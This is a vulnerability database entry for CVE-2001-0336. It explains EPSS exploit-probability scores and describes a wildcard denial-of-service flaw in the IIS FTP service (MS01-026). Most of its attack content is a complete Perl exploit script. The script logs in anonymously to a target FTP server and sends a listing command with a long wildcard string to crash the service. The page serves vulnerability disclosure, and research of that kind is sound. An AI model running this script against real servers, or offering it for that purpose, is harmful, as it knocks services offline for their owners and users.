CVE-2001-0336 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/2717/info Due to a flaw in the pattern-matching function used by FTP commands, denial of service attacks can be successfully launched. If a user submits an FTP command along with a filename containing specially placed wildcard sequences, the pattern-matching function will not allocate sufficent memory. Resulting in IIS experiencing denial of service condition. #!/usr/bin/perl # Author: Nelson Bunker - Critical Watch # http://www.criticalwatch.com # # Simple Wildcard Denial of Service for IIS Ftp Servers - MS01-026 # Tested against several servers. Your mileage may vary. # # Assumes anonymous access. # # Thanks goes out to Lukasz Luzar [[email protected]] # For discovering and sharing this information # # May 15, 2001 ####################_MAIN::Begin_##################### use Net::FTP; $wildcard='*********************************************************************************************************'; if (not $ARGV[0]) { print qq~ Usage: wildcard_dos.pl <host> ~; exit;} $IPaddress= $ARGV[0]; $SIG {'PIPE'} = FoundIt; # create new FTP connection w/30 second timeout $ftp = Net::FTP->new($IPaddress, Timeout => 5); if(!$ftp){ die"$IPaddress is not responding to ftp connect attempt";} if(!$ftp->login("anonymous","tester\@")){ die"FTP user anonymous on $IPaddress is unacceptable";} $bogus = $ftp->ls($wildcard); sub FoundIt { print "This machine \($IPaddress\) is affected\n"; exit(0); }